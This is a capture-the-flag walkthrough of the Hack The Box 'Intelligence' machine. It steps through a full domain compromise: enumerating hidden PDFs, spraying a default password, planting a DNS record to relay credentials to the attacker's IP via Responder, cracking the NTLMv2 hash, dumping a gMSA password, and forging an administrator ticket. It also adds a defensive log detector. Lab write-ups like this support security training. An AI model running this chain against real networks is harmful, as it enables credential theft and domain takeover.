# Intelligence
###### tags: `OSCP`
https://www.hackthebox.eu/home/machines/profile/357

First connect to Hack The Box vpn:
```
openvpn {username}.ovpn
```

Seems that my machine is `10.10.14.19`.
Then check the target machine:
```
nmap -sS -sV -A -p- -oN NmapIntelligence.txt 10.10.10.248
```

We can find the domain name in the nmap output, served by the IIS server. Let's add the domain name to the hosts file.
```
echo '10.10.10.248 dc.intelligence.htb intelligence.htb' >> /etc/hosts
```
After a quick browse, we find two PDF links on the index page.
It's an IIS web service, so we can check whether it's vulnerable to tilde (short name) enumeration.
```
git clone https://github.com/irsdl/IIS-ShortName-Scanner.git
cd IIS-ShortName-Scanner
# arguments: threads, timeout in seconds, target URL
java -jar iis_shortname_scanner.jar 2 20 http://intelligence.htb/
```

After the IIS tilde enumeration, we know there are several unlinked PDFs that can be enumerated.
Let's create the number lists for the enumeration script:
```
seq -w 1 31 > days.txt
seq -w 1 12 > months.txt
```
`seq -w` pads every number to the same width, so the 1~9 units digits get the leading `0` that the file names require.
```
#!/usr/bin/python3
# Probe every 2020-MM-DD-upload.pdf combination and save the ones that exist.
import requests

with open('days.txt', 'r') as dayList:
    days = [d.strip() for d in dayList if d.strip()]
with open('months.txt', 'r') as monthList:
    months = [m.strip() for m in monthList if m.strip()]

for month in months:
    for day in days:
        # zfill keeps the name valid even if the lists were not zero-padded
        name = f'2020-{month.zfill(2)}-{day.zfill(2)}-upload.pdf'
        url = f'http://intelligence.htb/documents/{name}'
        ret = requests.get(url)
        if ret.status_code == 200:
            print(f'[*] Found -- {url}')
            # write the response body directly instead of shelling out to wget
            with open(name, 'wb') as out:
                out.write(ret.content)
            print(f'[+] Downloaded -- {url}')
```
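The date-based probing above is noisy on the server side: a single client produces a burst of 404s under `/documents/`. As an added example (not part of the original writeup), this is a small defender-side check that parses IIS W3C log lines and flags clients that exceed a threshold of 404s under a path prefix within a sliding window. The log excerpt is constructed for illustration, not real traffic from the box.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed IIS W3C excerpt. Field order: date time s-ip cs-method cs-uri-stem
# cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
# sc-substatus sc-win32-status time-taken
SAMPLE_LOG = """\
2021-07-03 10:01:00 10.10.10.248 GET /documents/2020-01-01-upload.pdf - 80 - 10.10.14.19 python-requests/2.25.1 - 200 0 0 15
2021-07-03 10:01:00 10.10.10.248 GET /documents/2020-01-02-upload.pdf - 80 - 10.10.14.19 python-requests/2.25.1 - 200 0 0 12
2021-07-03 10:01:01 10.10.10.248 GET /documents/2020-01-03-upload.pdf - 80 - 10.10.14.19 python-requests/2.25.1 - 404 0 2 3
2021-07-03 10:01:01 10.10.10.248 GET /documents/2020-01-04-upload.pdf - 80 - 10.10.14.19 python-requests/2.25.1 - 404 0 2 2
2021-07-03 10:01:01 10.10.10.248 GET /documents/2020-01-05-upload.pdf - 80 - 10.10.14.19 python-requests/2.25.1 - 404 0 2 2
2021-07-03 10:01:02 10.10.10.248 GET /documents/2020-01-06-upload.pdf - 80 - 10.10.14.19 python-requests/2.25.1 - 404 0 2 2
2021-07-03 10:01:02 10.10.10.248 GET /documents/2020-01-07-upload.pdf - 80 - 10.10.14.19 python-requests/2.25.1 - 404 0 2 2
2021-07-03 10:01:03 10.10.10.248 GET /documents/2020-01-08-upload.pdf - 80 - 10.10.14.19 python-requests/2.25.1 - 404 0 2 2
2021-07-03 10:05:40 10.10.10.248 GET /documents/2020-01-01-upload.pdf - 80 - 10.10.14.77 Mozilla/5.0 http://intelligence.htb/ 200 0 0 20
2021-07-03 10:06:10 10.10.10.248 GET /documents/missing.pdf - 80 - 10.10.14.77 Mozilla/5.0 http://intelligence.htb/ 404 0 2 3
"""

def parse_w3c(log_text):
    """Yield (timestamp, client_ip, uri_stem, status); skip '#' directive lines."""
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split()
        if len(f) < 12:
            continue  # malformed or truncated line
        ts = datetime.strptime(f"{f[0]} {f[1]}", "%Y-%m-%d %H:%M:%S")
        yield ts, f[8], f[4], int(f[11])

def find_enumeration(log_text, prefix="/documents/", threshold=5, window=timedelta(minutes=1)):
    """Return {client_ip: total_404s} for clients with >= threshold 404s under
    prefix inside any sliding window. Link-following visitors rarely do this."""
    misses = defaultdict(list)
    for ts, ip, uri, status in parse_w3c(log_text):
        if status == 404 and uri.startswith(prefix):
            misses[ip].append(ts)
    flagged = {}
    for ip, times in misses.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # drop hits older than the window
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged

if __name__ == "__main__":
    for ip, n in find_enumeration(SAMPLE_LOG).items():
        print(f"[!] {ip}: {n} 404s under /documents/ -- likely filename enumeration")
```

The same logic applies to any predictable naming scheme; tune `threshold` and `window` to the site's normal miss rate before alerting on it.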

After we get all accessible PDFs from the server, we can grep them for sensitive information.
```
for f in *.pdf; do pdftotext "$f"; done
mkdir txt
mv *.txt txt/
cd txt
grep -Hn 'account\|username\|password\|passwd' *.txt
```

Tracing back to the file: `2020-06-04-upload.pdf`

Here we only find the default password of this domain: `NewIntelligenceCorpUser9876`
Tracing back to the file: `2020-12-30-upload.pdf`

This means the gMSA can be abused if we find any credential that can read the gMSA's password; moreover, the gMSA is highly likely to have admin privilege on the DC, or even to be a domain admin.
Now we need a username to log into the server over SMB, so I try to check the metadata of the .pdf files.
```
exiftool 2020-01-01-upload.pdf
```

Then we find that `Creator` is automatically set to the uploading user's name.
We can grep and trim those values to generate a username list for brute-forcing the login with the default password.
```
exiftool *.pdf | grep Creator | cut -d ':' -f 2 | cut -d ' ' -f 2 > users;cat users
```

Now we have the username list. Let's use crackmapexec to check for a valid credential combination.
```
python3 -m pip install pipx
pipx ensurepath
pipx install crackmapexec
crackmapexec smb 10.10.10.248 -u users -p NewIntelligenceCorpUser9876
```

Here we find that the valid username is `Tiffany.Molina` with password `NewIntelligenceCorpUser9876`.
`Impacket` from `SecureAuth` is really recommended to install. Then we can use Tiffany's account to interact with the SMB service.
```
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python3 setup.py install
smbclient.py intelligence.htb/Tiffany.Molina:NewIntelligenceCorpUser9876@10.10.10.248
```

We successfully get `user.txt` from Tiffany's desktop.
Now we need to dig deeper to find a path to admin privilege.

There's nothing special or unauthorized to access; we only get `downdetector.ps1` from the `IT` share.
```
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
# Every DNS record in the zone whose name starts with "web" is requested, and
# -UseDefaultCredentials sends the running account's credentials to whatever host that name resolves to.
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
```
This script uses `-UseDefaultCredentials` to request the status of every DNS name with the `web` prefix and emails `Ted.Graves` if any service is down, every 5 minutes.
As we found in the SMB `Users` share, `Administrator`, `Ted.Graves` and `Tiffany.Molina` have logged on to this server. Tiffany is definitely not in the admin group. We can check whether Ted is in the admin group once we get his cred. Or, if we're luckier, is this script run by `Administrator`?
Let's add a fake DNS record to the zone with `dnstool`, a tool from the `https://github.com/dirkjanm/krbrelayx` suite.
```
git clone https://github.com/dirkjanm/krbrelayx.git
cd krbrelayx
ln *.py /usr/local/bin
dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'webnotsurprised.intelligence.htb' -d 10.10.14.19 10.10.10.248
```

Here `10.10.14.19` is our Kali IP; then we use `responder` to capture the credential and wait 5 minutes.
```
responder -I tun0 -A
```

Save the hash we get from `Responder` to a text file and use hashcat to crack it.
```
hashcat -m 5600 -a 0 -o cracked.txt --force Hash.txt /usr/share/wordlists/rockyou.txt
```
For NTLMv2 we set the hash mode to `5600` and the attack mode to `Straight` (`-a 0`) for the first try. `--force` ignores hashcat's warnings.

Now we have another valid cred in the Intelligence domain. As the IT manager's cred, it might be able to access the gMSA.
Let's try `gMSADumper`, a tool provided by the machine's creator: https://github.com/micahvandeusen/gMSADumper
```
gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
```

Here we get a service account and its hash.
With a service account's hash we can request a Silver Ticket for any other user in this domain, which means we can use this hash to launch a Pass the Ticket attack.
Since we're working with Kerberos, our clock has to be within 5 minutes of the Kerberos server's time, so set that before we start requesting tickets.
```
net time set -S 10.10.10.248
```
To use `getST.py` from `impacket`, we need to get the SPN first.
```
python3 pywerview.py get-netcomputer -u svc_int$ --hashes 47e89a6afd68e3872ef1acaf91d0b2f7 -d intelligence.htb -t dc.intelligence.htb --full-data
```

Now all parameters for `getST.py` are set.
```
getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :47e89a6afd68e3872ef1acaf91d0b2f7 -impersonate administrator
```

After we get the ticket, we need to point the `KRB5CCNAME` environment variable at it so the impacket tools pick it up.
```
export KRB5CCNAME=administrator.ccache
```
Then use the admin ticket to Pass the Ticket with `smbclient.py`.
```
smbclient.py -k intelligence.htb/administrator@dc.intelligence.htb -no-pass
```
